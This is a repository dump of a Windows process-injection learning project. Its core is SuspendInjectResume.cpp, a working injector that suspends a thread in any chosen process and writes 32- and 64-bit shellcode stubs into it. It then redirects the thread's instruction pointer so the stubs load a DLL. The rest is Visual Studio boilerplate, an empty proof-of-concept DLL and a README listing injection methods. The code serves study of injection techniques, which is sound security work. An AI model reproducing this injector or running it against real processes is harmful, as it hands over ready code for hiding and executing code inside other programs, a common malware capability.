{6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A} 24 | Win32Proj 25 | PoCDll 26 | 10.0.17763.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;POCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Windows 96 | true 97 | 98 | 99 | 100 | 101 | Use 102 | Level3 103 | Disabled 104 | true 105 | _DEBUG;POCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Windows 110 | true 111 | 112 | 113 | 114 | 115 | Use 116 | Level3 117 | MaxSpeed 118 | true 119 | true 120 | true 121 | WIN32;NDEBUG;POCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 122 | true 123 | 124 | 125 | Windows 126 | true 127 | true 128 | true 129 | 130 | 131 | 132 | 133 | Use 134 | Level3 135 | MaxSpeed 136 | true 137 | true 138 | true 139 | NDEBUG;POCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 140 | true 141 | 142 | 143 | Windows 144 | true 145 | true 146 | true 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | Create 158 | Create 159 | Create 160 | Create 161 | 162 | 163 | 164 | 165 | 166 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/PoC_Dll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | #include 4 | #include 5 | 6 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 7 | { 8 | switch (ul_reason_for_call) 9 | { 10 | case DLL_PROCESS_ATTACH: 11 | break; 12 | case DLL_PROCESS_DETACH: 13 | break; 14 | case DLL_THREAD_ATTACH: 15 | break; 16 | case DLL_THREAD_DETACH: 17 | break; 18 | } 19 | return TRUE; 20 | } 21 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files 12 | #include 13 | 14 | 15 | 16 | // reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ProcessInjectionTechniques 2 | Learning Various Process Injection Techniques 3 | 4 | 5 | Method | 32 bits | 64 bits | todo 6 | -----------------------|---------|---------|------- 7 | CreateRemoteThread() | + | + | done 8 | NtCreateThreadEx() | + | + | done 9 | QueueUserAPC() | + | + | done 10 | SetWindowsHookEx() | + | + | done 11 | RtlCreateUserThread() | + | + | done 12 | SetThreadContext() | + | + | done 13 | Reflective DLL | + | + | ToDo -------------------------------------------------------------------------------- /SuspendInjectResume/SuspendInjectResume.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SuspendInjectResume", "SuspendInjectResume\SuspendInjectResume.vcxproj", "{4177063C-98E8-4E61-B3E9-6CF709C3E0D1}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Debug|x64.ActiveCfg = Debug|x64 17 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Debug|x64.Build.0 = Debug|x64 18 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Debug|x86.ActiveCfg = Debug|Win32 19 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Debug|x86.Build.0 = Debug|Win32 20 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Release|x64.ActiveCfg = Release|x64 21 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Release|x64.Build.0 = Release|x64 22 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Release|x86.ActiveCfg = Release|Win32 23 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {05E29D09-D557-4EFB-B1DB-2539CDD9439E} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /SuspendInjectResume/SuspendInjectResume/SuspendInjectResume.cpp: -------------------------------------------------------------------------------- 1 | // SuspendInjectResume.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | DWORD getThreadID(DWORD pid) 13 | { 14 | HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); 15 | if (h != INVALID_HANDLE_VALUE) 16 | { 17 | THREADENTRY32 te; 18 | te.dwSize = sizeof(te); 19 | if (Thread32First(h, &te)) 20 | { 21 | do 22 | { 23 | if (te.dwSize >= FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(te.th32OwnerProcessID)) 24 | { 25 | if (te.th32OwnerProcessID == pid) 26 | { 27 | HANDLE hThread = OpenThread(READ_CONTROL, FALSE, te.th32ThreadID); 28 | if (!hThread) 29 | wprintf(TEXT("[-] Error: Couldn't get thread handle\n")); 30 | else 31 | return te.th32ThreadID; 32 | } 33 | } 34 | } while (Thread32Next(h, &te)); 35 | } 36 | } 37 | 38 | CloseHandle(h); 39 | return (DWORD)0; 40 | } 41 | 42 | #ifndef _WIN64 43 | 44 | unsigned char sc[] = 45 | { 46 | 0x68, 0xef, 0xbe, 0xad, 0xde, // push 0xDEADBEEF 47 | 0x9c, // pushfd 48 | 0x60, // pushad 49 | 0x68, 0xef, 0xbe, 0xad, 0xde, //push 0xDEADBEEF 50 | 0xb8, 0xef, 0xbe, 0xad, 0xde, // mov eax, 0xDEADBEEF 51 | 0xff, 0xd0, // call eax 52 | 0x61, // popad 53 | 0x9d, //popfd 54 | 0xc3 //ret 55 | }; 56 | 57 | DWORD demoSuspendInjectResume(PCWSTR pszLibFile, DWORD dwProcessId) 58 | { 59 | void *stub; 60 | unsigned long threadID, oldIP, oldprot; 61 | HANDLE hThread; 62 | CONTEXT ctx; 63 | 64 | DWORD stubLen = sizeof(sc); 65 | 66 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId); 67 | if (hProcess == NULL) 68 | { 69 | wprintf(L"[-] Error: Could not open process for PID (%d).\n", dwProcessId); 70 | return(1); 71 | } 72 | DWORD LoadLibraryAddress = (DWORD)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryW"); 73 | if (LoadLibraryAddress == NULL) 74 | { 75 | wprintf(L"[-] Error: Could not find LoadLibraryA function inside kernel32.dll library.\n"); 76 | exit(1); 77 | } 78 | 79 | SIZE_T dwSize = (wcslen(pszLibFile) + 1) * sizeof(wchar_t); 80 | 81 | LPVOID lpDllAddr = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 82 | if (lpDllAddr == NULL) 83 | { 84 | wprintf(L"[-] Error: Could not allocate memory inside PID (%d).\n", dwProcessId); 85 | exit(1); 86 | } 87 | 88 | stub = VirtualAllocEx(hProcess, NULL, stubLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 89 | if (stub == NULL) 90 | { 91 | wprintf(L"[-] Error: Could not allocate memory for stub.\n"); 92 | exit(1); 93 | } 94 | 95 | BOOL bStatus = WriteProcessMemory(hProcess, lpDllAddr, pszLibFile, dwSize, NULL); 96 | if (bStatus == 0) 97 | { 98 | wprintf(L"[-] Error: Could not write any bytes into the PID (%d) address space.\n", dwProcessId); 99 | return(1); 100 | } 101 | 102 | threadID = getThreadID(dwProcessId); 103 | hThread = OpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, threadID); 104 | if (hThread != NULL) 105 | { 106 | SuspendThread(hThread); 107 | } 108 | else 109 | printf("could not open thread\n"); 110 | 111 | ctx.ContextFlags = CONTEXT_CONTROL; 112 | GetThreadContext(hThread, &ctx); 113 | oldIP = ctx.Eip; 114 | ctx.Eip = (DWORD)stub; 115 | ctx.ContextFlags = CONTEXT_CONTROL; 116 | 117 | VirtualProtect(sc, stubLen, PAGE_EXECUTE_READWRITE, &oldprot); 118 | memcpy((void *)((unsigned long)sc + 1), &oldIP, 4); 119 | memcpy((void *)((unsigned long)sc + 8), &lpDllAddr, 4); 120 | memcpy((void *)((unsigned long)sc + 13), &LoadLibraryAddress, 4); 121 | 122 | WriteProcessMemory(hProcess, stub, sc, stubLen, NULL); 123 | SetThreadContext(hThread, &ctx); 124 | 125 | ResumeThread(hThread); 126 | 127 | Sleep(8000); 128 | 129 | VirtualFreeEx(hProcess, lpDllAddr, dwSize, MEM_DECOMMIT); 130 | VirtualFreeEx(hProcess, stub, stubLen, MEM_DECOMMIT); 131 | CloseHandle(hProcess); 132 | CloseHandle(hThread); 133 | 134 | return(0); 135 | } 136 | #else 137 | 138 | unsigned char sc[] = { 139 | 0x50, // push rax (save rax) 140 | 0x48, 0xB8, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rax, 0CCCCCCCCCCCCCCCCh (place holder for return address) 141 | 0x9c, // pushfq 142 | 0x51, // push rcx 143 | 0x52, // push rdx 144 | 0x53, // push rbx 145 | 0x55, // push rbp 146 | 0x56, // push rsi 147 | 0x57, // push rdi 148 | 0x41, 0x50, // push r8 149 | 0x41, 0x51, // push r9 150 | 0x41, 0x52, // push r10 151 | 0x41, 0x53, // push r11 152 | 0x41, 0x54, // push r12 153 | 0x41, 0x55, // push r13 154 | 0x41, 0x56, // push r14 155 | 0x41, 0x57, // push r15 156 | 0x68, 0xef,0xbe,0xad,0xde, 157 | 0x48, 0xB9, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rcx, 0CCCCCCCCCCCCCCCCh (place holder for DLL path name) 158 | 0x48, 0xB8, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rax, 0CCCCCCCCCCCCCCCCh (place holder for LoadLibrary) 159 | 0xFF, 0xD0, // call rax (call LoadLibrary) 160 | 0x58, // pop dummy 161 | 0x41, 0x5F, // pop r15 162 | 0x41, 0x5E, // pop r14 163 | 0x41, 0x5D, // pop r13 164 | 0x41, 0x5C, // pop r12 165 | 0x41, 0x5B, // pop r11 166 | 0x41, 0x5A, // pop r10 167 | 0x41, 0x59, // pop r9 168 | 0x41, 0x58, // pop r8 169 | 0x5F, // pop rdi 170 | 0x5E, // pop rsi 171 | 0x5D, // pop rbp 172 | 0x5B, // pop rbx 173 | 0x5A, // pop rdx 174 | 0x59, // pop rcx 175 | 0x9D, // popfq 176 | 0x58, // pop rax 177 | 0xC3 // ret 178 | }; 179 | 180 | DWORD demoSuspendInjectResume64(PCWSTR pszLibFile, DWORD dwProcessId) 181 | { 182 | void *stub; 183 | unsigned long threadID, oldprot; 184 | HANDLE hThread; 185 | CONTEXT ctx; 186 | 187 | DWORD64 stubLen = sizeof(sc); 188 | wprintf(TEXT("[+] Shellcode Length is: %d\n"), stubLen); 189 | 190 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId); 191 | if (hProcess == NULL) 192 | { 193 | wprintf(L"[-] Error: Could not open process for PID (%d).\n", dwProcessId); 194 | return(1); 195 | } 196 | 197 | DWORD64 LoadLibraryAddress = (DWORD64)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryW"); 198 | if (LoadLibraryAddress == NULL) 199 | { 200 | wprintf(L"[-] Error: Could not find LoadLibraryA function inside kernel32.dll library.\n"); 201 | exit(1); 202 | } 203 | 204 | SIZE_T dwSize = (wcslen(pszLibFile) + 1) * sizeof(wchar_t); 205 | 206 | LPVOID lpDllAddr = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 207 | if (lpDllAddr == NULL) 208 | { 209 | wprintf(L"[-] Error: Could not allocate memory inside PID (%d).\n", dwProcessId); 210 | exit(1); 211 | } 212 | 213 | stub = VirtualAllocEx(hProcess, NULL, stubLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 214 | if (stub == NULL) 215 | { 216 | wprintf(L"[-] Error: Could not allocate memory for stub.\n"); 217 | exit(1); 218 | } 219 | 220 | SIZE_T nBytesWritten = 0; 221 | BOOL bStatus = WriteProcessMemory(hProcess, lpDllAddr, pszLibFile, dwSize, &nBytesWritten); 222 | if (bStatus == 0) 223 | { 224 | wprintf(L"[-] Error: Could not write any bytes into the PID (%d) address space.\n", dwProcessId); 225 | return(1); 226 | } 227 | if (nBytesWritten != dwSize) 228 | wprintf(TEXT("[-] Something is wrong!\n")); 229 | 230 | threadID = getThreadID(dwProcessId); 231 | hThread = OpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, threadID); 232 | if (hThread != NULL) 233 | { 234 | SuspendThread(hThread); 235 | } 236 | else 237 | wprintf(L"[-] Could not open thread\n"); 238 | 239 | ctx.ContextFlags = CONTEXT_CONTROL; 240 | GetThreadContext(hThread, &ctx); 241 | 242 | DWORD64 oldIP = ctx.Rip; 243 | ctx.Rip = (DWORD64)stub; 244 | ctx.ContextFlags = CONTEXT_CONTROL; 245 | 246 | memcpy(sc + 3, &oldIP, sizeof(oldIP)); 247 | memcpy(sc + 41, &lpDllAddr, sizeof(lpDllAddr)); 248 | memcpy(sc + 51, &LoadLibraryAddress, sizeof(LoadLibraryAddress)); 249 | 250 | #ifdef _DEBUG 251 | wprintf(TEXT("[+] Shellcode Launcher Code:\n\t")); 252 | for (int i = 0; i < stubLen; i++) 253 | wprintf(TEXT("%02x "), sc[i]); 254 | wprintf(TEXT("\n")); 255 | #endif 256 | 257 | WriteProcessMemory(hProcess, (void *)stub, &sc, stubLen, NULL); 258 | 259 | SetThreadContext(hThread, &ctx); 260 | ResumeThread(hThread); 261 | 262 | Sleep(8000); 263 | 264 | VirtualFreeEx(hProcess, lpDllAddr, dwSize, MEM_DECOMMIT); 265 | VirtualFreeEx(hProcess, stub, stubLen, MEM_DECOMMIT); 266 | CloseHandle(hProcess); 267 | CloseHandle(hThread); 268 | 269 | return(0); 270 | } 271 | 272 | #endif 273 | 274 | int main(int argc, char* argv) 275 | { 276 | int pid; 277 | puts("Inject into which PID: "); 278 | scanf_s("%u", &pid); 279 | puts("Method used to attach thread is : SuspendInjectResume"); 280 | DWORD dwProcessId = (DWORD)pid; 281 | // const char* dll = "C:\\v.dll"; 282 | PCWSTR pszLibFile = L"C:\\DLLTest.dll"; 283 | #ifndef _WIN64 284 | DWORD a = demoSuspendInjectResume(pszLibFile, dwProcessId); 285 | #else 286 | DWORD a = demoSuspendInjectResume64(pszLibFile, dwProcessId); 287 | #endif 288 | //int result = injectIntoPID(pid); 289 | //if (result == -1) 290 | //{ 291 | // puts("Could not inject into PID"); 292 | //} 293 | system("pause"); 294 | } 295 | -------------------------------------------------------------------------------- /SuspendInjectResume/SuspendInjectResume/SuspendInjectResume.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1} 24 | Win32Proj 25 | SuspendInjectResume 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | Create 159 | Create 160 | Create 161 | Create 162 | 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /SuspendInjectResume/SuspendInjectResume/SuspendInjectResume.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /SuspendInjectResume/SuspendInjectResume/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /SuspendInjectResume/SuspendInjectResume/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | --------------------------------------------------------------------------------